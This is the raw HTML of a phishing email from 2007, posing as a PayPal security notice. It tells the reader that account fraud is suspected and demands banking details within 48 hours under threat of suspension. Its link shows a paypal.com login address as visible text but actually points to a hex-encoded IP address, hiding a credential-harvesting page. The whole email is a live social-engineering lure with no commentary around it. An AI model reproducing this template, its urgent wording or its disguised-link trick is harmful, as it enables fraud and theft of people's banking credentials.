Subject: Compromised PayPal Account

From: "PayPal" <[email-masked]>
Date: Sat, 03 Mar 2007 04:11:21 -0200

<html><body> <table border="0" cellpadding="0"
cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%"><tr><td
width="100%" style="border-style: solid; border-width: 0; padding-left: 4; padding-right: 4;
padding-top: 1;
padding-bottom: 1"><br>PayPal Account® Posible Fraud - Notification</p><br>Security  check
!<br><br></b></font>You have received this email because your account has been used from different
locations by you or someone else.<br>For security purpose, we are required to open an investigation
into this matter.<br><font face="Times New Roman"><br></font>In order to safeguard your account, we
require that you confirm your banking details.<br>To help speed up this process, please access the
following link so we cancomplete the verification of<br>your PayPal
Account:<br><br><b><BR><BR>Alert code: 1366968850 <BR><BR>

<a target=_blank
HREF='http://0xd2.0xb1.0xf5.0xc5/cgi-bin-sk'>
https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit/?136</a>

 </b></p><br>
<table cellpadding="0" cellspacing="0" style="border-collapse: collapse; padding: 0"
bordercolor="#111111" width="100%"
bgcolor="#FF9966">
        <tr>
          <td width="100%">Please Note:<br>
            If we do no receive the appropriate account verification within 48
            hours, then we will assume this PayPal
            Bank account is fraudulent and will be suspended.
            The purpose of this verification is to ensure that your bank account
            has not been fraudulently used and
            to combat the fraud from our community.</td>
      </tr>
    </table>
      <p dir="ltr" align="left">We appreciate your support and understanding and
        thank you for your prompt attention to this matter.<br>
        <br>
Regards,
<p> PayPal - Paypal Account® Security Department</p><table border="0" cellpadding="0"
cellspacing="0" style="border-collapse: collapse" bordercolor="#111111"
width="100%"><tr><td width="100%" bgcolor="#004F4F"><p align="center"><b><font color="#FFFFFF">© 2007
PayPal Account & Co.</font></b></td></tr><tr><td width="100%"><p dir="ltr" align="center"><font
size="2" color="#999999">Please do not reply to this email as this is only a notification. Mail sent
to this address cannot be answered.</font></p></td></tr><tr><td width="100%" bgcolor="#004F4F"><div
align="center"><font color="#FFFFFF">PayPal Account® Banking             Departament</font></div>
</td>        </tr>      </table>    </td>  </tr></table></body></html>